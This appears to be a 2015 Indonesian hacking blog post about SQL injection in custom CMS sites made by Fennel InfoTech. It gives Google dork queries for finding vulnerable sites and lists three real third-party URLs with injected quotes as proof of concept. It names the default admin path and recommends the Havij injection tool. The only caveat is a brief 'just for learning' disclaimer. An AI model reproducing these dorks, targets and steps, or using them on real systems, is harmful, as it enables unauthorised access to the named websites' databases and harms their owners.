Follow Instagram Kami [=>] www.instagram.com/rinaldi1001101 [=]

Minggu, 28 Juni 2015

Fennel InfoTech CMS All Version Sql-Injection

Google Dork: "Designed by: Fennel Infotech"  , intext:"Designed by: Fennel Infotech" inurl:"id="

Sql Injection In Fenell Info Tech CMSes Created Beacuse CMSes Are Custom We Dont Have A Defualt PHP File Like term.php?id=

so we must use Dork to find web vuln



Poc Of VulnerAbility:

 http://klgshare.in/service-detail.php?id=9%27

 http://www.jewellerytaglabel.com/tags_details.php?id=63%27

 http://www.touchofhopefoundation.org/sub.php?id=36%27

[Default Admin Page]

You Should Add '/admin/' at the end of the URL

Inject manullay or use havij!

Nb: use this for positive things TS is not responsible for you use in a negative things, so just for learning,

Thanks You, Happy learning

By Tener_Attacker

Tidak ada komentar:

Posting Komentar